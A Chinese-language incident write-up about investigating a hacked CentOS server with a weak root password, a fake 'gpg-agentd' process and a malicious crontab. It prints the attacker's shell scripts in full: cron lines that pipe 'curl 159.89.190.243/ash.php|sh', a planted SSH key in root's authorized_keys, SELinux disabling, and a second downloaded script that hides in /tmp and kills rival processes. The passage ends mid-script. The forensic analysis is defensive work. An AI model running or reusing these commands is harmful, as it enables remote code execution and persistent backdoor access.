让 运 维 的 同 事 把 端 口 改 了 一 下 , 立 马 连 上 去 , 顺 便 看 了 一 下 登 录 名
:root,还有不足 8 位的小白密码,心里一凉:被黑了!
查找线索
服 务 器 系 统 CentOS 6.X , 部 署 了 Nginx , Tomcat , Redis
等应用,上来先把数据库全备份到本地,然后 Top 命令看了一下,有 2 个
99% 的同名进程还在运行,叫 gpg-agentd。
Google 了一下 GPG,结果是: GPG 提供的 gpg-agent 提供了对 SSH
协议的支持,这个功能可以大大简化密钥的管理工作。
看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一
个字母 d,伪装的很好,让人想起来 Windows 上各种看起来像 svchost.exe
的病毒。
继续排查:
ps eho command -p 23374netstat -pan | grep 23374
查 看 pid : 23374 进 程 启 动 路 径 和 网 络 状 况 , 也 就 是 来 到 了 图 1
的目录,到此已经找到了黑客留下的二进制可执行文件。
接下来还有 2 个问题在等着我:
文件是怎么上传的?
这个文件的目的是什么,或是黑客想干嘛?
History 看一下,记录果然都被清掉了,没留下任何痕迹。继续命令 more
messages:
看 到 了 在 半 夜 12
点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详
细讲。
边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?
对,计划任务:
crontab -e
果然,线索找到了。
作案动机
上 面 的 计 划 任 务 的 意 思 就 是 每 15
分钟去服务器上下载一个脚本,并且执行这个脚本。
我们把脚本下载下来看一下:
curl -fsSL 159.89.190.243/ash.php > ash.sh
脚本内容如下:
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo'ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlM
sXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKm
Mza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7n
ZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc
2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj
8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/G
N3+ThY+PNUqx
redisX' > /root/.ssh/authorized_keys
echo'*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' >
/var/spool/cron/root
echo'*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' >
/var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null
**大 致 分析 一 下该 脚 本的 主 要用 途 :** 首 先是关 闭 SELinux ,解 除 Shell
资 源 访 问 限 制 , 然 后 在 /root/.ssh/authorized_keys 文 件 中 生 成 SSH
公钥。
这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多。
接 下 来 安 装 Bash , 最 后 是 继 续 下 载 第 二 个 脚 本
bsh.php,并且执行。继续下载并分析 bsh.pbp,内容如下:
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-
unix/...
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print
$1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ &&
/barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print
